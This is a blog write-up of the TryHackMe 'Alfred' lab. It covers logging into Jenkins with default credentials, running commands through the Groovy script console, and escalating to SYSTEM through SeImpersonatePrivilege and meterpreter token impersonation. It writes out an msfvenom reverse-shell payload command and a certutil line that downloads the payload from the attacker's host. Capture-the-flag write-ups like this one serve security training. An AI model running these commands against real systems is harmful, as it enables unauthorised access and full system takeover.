Hacking Alfred (thm)

The Alfred box from thm teaches us more about attacking jenkins and abusing the SeImpersonatePrivilege to perform priv esc on a windows system...

 

A quick nmap scan showed that three common tcp ports were open - port 8080 seemed to be the most likely one to be serving jenkins.



It would be easy at this point to navigate to the webpages, but I wanted to try eyewitness on them first. This may seem pointless (and it is!) for such a room as this one, but eyewitness is useful when web app testing, especially if there are lots of domains to check. It gives us a good high level overview of what we are up against.


The first step with eyewitness is to create a file which contains the domains to be targeted. I created a .txt file to do this.




Eyewitness provides us with an html report which can be opened. In this example, the results have been saved into a directory using the -d flag. We can see the results there, too. The scan unsurprisingly revealed that jenkins was running on port 8080.





Jenkins is a tool used by developers to continuously build and test their projects. It runs on Tomcat port 8080 by default and even though it shouldn't be running as the SYSTEM account is often is. This means if we can exploit it to get a shell on the server we will land as a powerful user.

 

Jenkins might be set up using default credentials such as admin:admin or on an internal pen test it might not have any authentication needed at all. Knowing this, I tried the default credentials of admin:admin and found they gave me access.

 

 



Once we have gained access to a jenkins application, it is worth navigating to the /script directory. This should give us access to the scripts console in which we can run groovy scripts. Apache Groovy is a language which is compatible with java. It gets compiled into java bytecode and can therefore run on any platform that has jre installed.


From our perspective, finding the groovy script console is good because groovy lets us run system commands - the script console is similar to having a web shell. The commands we use will vary depending on whether the targeted server is running windows or linux. In this case, we know it is running windows - from the room description and the fact that our nmap scans revealed that microsoft iis is being used as a web server on port 80.


I first of all tried a simple system command to see if I could get the groovy script console to work.


def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");




Next, I tried a reverse shell which can be found here



We just need to change the host and port values and start a netcat listener before running the script. A reverse shell was successfully opened. The user flag was soon found.





The user bruce is a low privileged user. I forgot to screenshot the privileges associated with the account but they can be found by using

whomai /priv


We see that bruce has the SeImpersonatePrivilege which is our route to priv esc on this box.

 

Privileges can be seen as the rights associated with an account when it comes to performing different actions such as managing services or debugging applications. Low level users do not have many privileges, whereas high level users have more. Privileges can be gained by belonging to groups. Lots of groups on windows give their members powerful privileges, so even low level users can have important privileges by belonging to different groups.


Coming back to the SeImpersonatePrivilege which the user bruce has. This privilege lets users which have it impersonate the access tokens of other users.

 

When a user successfully authenticates to windows, the winlogon.exe process generates an access token which includes the identity and privileges of the user account. This token then gets attached to the userinit.exe process. Now, all child processes started by the user will inherit a copy of the access token and therefore run using its privileges. If a low level user which does not have many privileges has the SeImpersonatePrivilege, they may well be able to impersonate a more privileged user via their access token. We can think of access tokens as being like session cookies. It is common for service accounts to have this privilege. This means it is always worth looking for it if we gain access to a system via an asp.net web application, mssql queries or a jenkins installation.


In order to abuse the SeImpersonatePrivilege we can try using the incognito module via a meterpreter session. If this does not work, we can try a potato attack such as juicy potato. This is not required for this box, though. We can succeed via the incognito module. I therefore created a malicious binary using msfvenom and transferred it to the compromised machine by starting a simple server on my attacking machine with python and then making a \Temp directory on the victim machine before using the certutil tool to transfer the malicious binary.


sudo msfvenom -p windows/meterpreter/reverse_tcp --encoder x86/shikata_ga_nai LHOST=10.8.46.6 LPORT=4445 --platform Windows -f exe -o puzz.exe


sudo python3 -m http.server 80


certutil -urlcache -f http://10.8.46.6/puzz.exe puzz.exe






I then started a handler in msfconsole and executed the malicious binary on the victim machine. This resulted in a meterpreter session.




Once we are in a meterpreter session, we can load the incognito module and then see if there are any access tokens available for us to impersonate. We can look for user and / or group tokens. The -g flag can be used for groups but in this case we use the -u flag to look for users.




It is worth noting that we might find delegation tokens but we might also find impersonate tokens. Impersonate level tokens are created as a direct result of a non-interactive logon to the system. Delegate level tokens are created as a direct result of interactive logons such as via winlogon.exe or remote logon services such as rdp.


Of the two, delegate level tokens are more dangerous as they can be used on any system as well as the local system. Impersonate level tokens can only be used on the local system.


Coming back to the box, we can impersonate the NT AUTHORITY\SYSTEM user.




Now we need to migrate our process to a process which is running as system. We can find these in meterpreter using:


ps -s





We can now operate with the privileges associated with the NT AUTHORITY\SYSTEM user and therefore retrieve the root flag.




It is worth noting that once we have impersonated a higher level user, we can list the tokens again as more may well be available. This might allow us to continue moving up levels. An example would be form a local service (low privileged account but has the SeImpersonatePrivilege) to an administrator account and then to nt authority\system.


The following pictures illustrate this process more clearly...











Thanks for reading my writeup of Alfred - I hope it was of some use - and thank you to tryhackme for creating it :-)


puzz00






Popular posts from this blog

Hacking Year of the Owl (thm)

Image
NOTE: I am currently migrating my writeups and cybersecurity notes to  my github This writeup can be found in a new and shiny form at puzz00 year of the owl writeup  --- The Year of the Owl is a machine by MuirlandOracle on tryhackme   We start by using nmap to scan the TCP ports. The results show us that this appears to be a windows machine because we see netbios on port 139, SMB on 445 and winrm on its default port of 5985. We take a closer look but don't find much of interest. Since SMB is running, we can try a null session attack, but this does not work. We cannot connect using rpcclient without valid creds, either. Web app enumeration does not reveal anything of interest, so I have not included it in this post. We need to find another way to enumerate usernames and potential passwords. We can try common UDP ports using nmap. The results come back in the open|filtered state which is not very useful. We do not know if the ports are open or if the UDP datagrams are bei...
Read more

Hacking Reset (thm)

Image
  NOTE: I am currently migrating my writeups and notes regarding hacking aka pentesting to  my github - my reset writeup can be found here     Reset is a fun active directory based box on thm   We start with an nmap scan which shows us that the target machine is probably a domain controller as it has port 88 open. Domain controllers typically have this port open since they are involved in kerberos based authentication. We also find some useful data regarding the domain and machine we are attacking. In addition, we find port 5985 is open - this is of interest as it is a port which is used by winrm which in turn is a service which could potentially give us a remote session on the target machine if we find valid credentials.    Since smb is being used, we start our enumeration of the haystack machine by taking a look at it - can we get a null session and thereby enumerate useful data? We find that we can. The IPC$ share has read access to non-authentica...
Read more

Simple CTF (tryhackme)

Image
  I started with a quick SYN scan of all ports on the target machine. The -T4 flag speeds up the scan from the default -T3 and the -p- flag specifies all ports to be scanned. As can be seen from the results, ports 21, 80 and 2222 had services listening on them. It was now time to take a closer look at those three ports, so I used the -A flag with nmap to find out more. The anonymous login allowed using FTP on port 21 seemed interesting, so I connected to it in passive mode using the username anonymous and no password ftp -p 10.10.179.144 The connection was successful, but I could not get any listing of the directories or files using ls so I turned my attention to port 80 by navigating to the home page in my browser. I was greeted with a default Apache "It Works!" page. I then checked the robots.txt file and fired up a directory buster. I used gobuster as it is fast, but dirb, dirbuster or a home-grown one would also do. The /simple directory stood out as interesting, so I na...
Read more